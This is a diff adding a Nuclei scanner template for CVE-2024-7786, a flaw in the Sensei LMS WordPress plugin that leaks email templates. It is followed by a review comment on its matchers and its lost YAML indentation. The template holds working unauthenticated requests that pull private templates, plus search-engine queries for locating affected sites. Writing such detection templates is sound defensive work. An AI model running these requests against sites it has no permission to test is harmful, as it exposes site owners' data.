diff --git a/http/cves/2024/CVE-2024-7786.yaml b/http/cves/2024/CVE-2024-7786.yaml
new file mode 100755
index 0000000000..0a3bacd01c
--- /dev/null
+++ b/http/cves/2024/CVE-2024-7786.yaml
@@ -0,0 +1,75 @@
+id: CVE-2024-7786
+
+info:
+ name: Sensei LMS < 4.24.2 - Email Template Leak
+ author: s4e-io
+ severity: high
+ description: |
+ The Sensei LMS WordPress plugin before 4.24.2 does not properly protect some its REST API routes, allowing unauthenticated attackers to leak email templates.
+ reference:
+ - https://wpscan.com/vulnerability/f44e6f8f-3ef2-45c9-ae9c-9403305a548a/
+ - https://nvd.nist.gov/vuln/detail/CVE-2024-7786
+ - https://www.usom.gov.tr/bildirim/tr-24-1387
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2024-7786
+ epss-score: 0.00043
+ epss-percentile: 0.09568
+ metadata:
+ max-request: 2
+ verified: true
+ vendor: automattic
+ product: sensei-lms
+ framework: wordpress
+ publicwww-query: "/wp-content/plugins/sensei-lms"
+ fofa-query: body="/wp-content/plugins/sensei-lms"
+ tags: cve,cve2024,wpscan,wp,wp-plugin,wordpress,sensei-lms,exposure
+
+flow: http(1) && http(2)
+
+http:
+ - raw:
+ - |
+ GET /index.php/wp-json/wp/v2/sensei_email/ HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'contains_all(body,"id","date_gmt","slug")'
+ - 'contains(content_type,"application/json")'
+ - 'status_code == 200'
+ condition: and
+ internal: true
+
+ extractors:
+ - type: json
+ part: body
+ name: template_id
+ json:
+ - '.[0].id'
+ internal: true
+
+ - raw:
+ - |
+ GET /index.php/wp-json/wp/v2/sensei_email/{{template_id}} HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - 'sensei_email_preview_id={{template_id}}'
+ - 'media?parent={{template_id}}'
+ condition: and
+
+ - type: word
+ part: content_type
+ words:
+ - 'application/json'
+
+ - type: status
+ status:
+ - 200
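Review bot: The step-1 DSL matcher only gates on generic REST fields (`id`, `date_gmt`, `slug`), a 200 status and a JSON content type, so any populated `wp/v2` collection would pass it and hand an id to step 2; the whole verdict therefore rests on the step-2 word matcher. If the objects returned by this route carry the usual WordPress `type` field (to be confirmed against a real response), adding `- 'contains(body,"sensei_email")'` to the step-1 `dsl` list would stop the second request on unrelated endpoints and reduce noise in triage. The step-2 words `sensei_email_preview_id={{template_id}}` and `media?parent={{template_id}}` are what actually tie a finding to a leaked template and should remain the decisive check. Note also that the collapsed diff has lost the template's indentation; the YAML should be re-checked with yamllint before merge since nuclei will reject a mis-nested file.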